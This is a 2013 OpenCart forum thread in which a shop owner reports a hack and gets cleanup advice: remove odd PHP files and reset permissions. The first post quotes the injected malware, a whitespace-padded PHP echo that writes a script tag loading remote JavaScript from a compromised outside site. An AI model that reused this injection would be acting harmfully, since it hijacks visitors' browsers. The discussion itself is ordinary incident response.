My opencart was hacked!

Quote

Post by etom » Mon Aug 05, 2013 4:45 pm

Hi guys, just noticed today a strange error on my site, when I view source and looked inside index.php I noticed the following code has been added to a few files on my site:

Code: Select all

                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                           function srcc() { var mk = document.createElement('script'); mk.src = 'http://www.photographybylouisedavies.co.uk/YbTVjBRr.php'; if (!document.getElementById('mk')) { document.write('<div id=\'mk\'></div>'); document.getElementById('mk').appendChild(mk); }}srcc();</script>";

#/d0186f#
I also noticed a few strange files in the download folder one was called aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg and others had random filenames.

I've disabled my site for now, and deleted this code from every file I can find it in, but it still seems to be present in the source. Searching this forum finds me threads regarding the files in the download folder but no other solutions for the javascript that has been injected into the source. Any help is greatly appreciated.

My version of Opencart is 1.5.2.1
etom
Newbie
Posts
1
Joined
Tue Nov 06, 2012 6:08 pm
Top

Re: My opencart was hacked!

Quote

Post by butte » Fri Aug 09, 2013 10:58 pm

The aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg is probably a text file, probably not executable but there for testing contact with the os.

RENAME THIS EXECUTABLE FILE N-O-W: /YbTVjBRr.php
Do not delete it just yet, somebody will need to examine it in order to mop up.

A successful hacker can execute extreme malice entirely via http within two seconds per connection. He knows that file's name and location, he can put it in his address bar. [People, DO NOT try to execute it, it responds with one short line, "ok" -- after it does what it does; my machine is extremely well protected, I deal with these.] Affected files will be distinguishable by timestamps and sizes. Permissions will probably have been altered so as to interfere with permission correction efforts.

See PM. (Okay, you're a new registrant, no PM button or receipt. Using mail.)

By the way, it is not disabled.
butte
Guru Member
Posts
7059
Joined
Wed Mar 20, 2013 6:58 am
Top

Re: My opencart was hacked!

Quote

Post by butte » Sun Aug 25, 2013 11:19 pm

Some of them are executable and are potentially dangerous as mime attacks. See http://forum.opencart.com/viewtopic.php ... 29#p431729 and the stuff above it.

It is well to check your permissions periodically as well as when you do find something weird -- directories 755, files 644, and ensure that if you correct them such as from 777, they stay corrected. Weird means weird. For example, this actual bad file with a weird name, executable YbTVjBRr.php must be deleted. If you see a seemingly benign executable default.php among OC files, delete it; not benign, start looking for and deleting other oddments.
butte
Guru Member
Posts
7059
Joined
Wed Mar 20, 2013 6:58 am
Top
Post Reply
Return to “General Support”
Who is online

Users browsing this forum: No registered users and 32 guests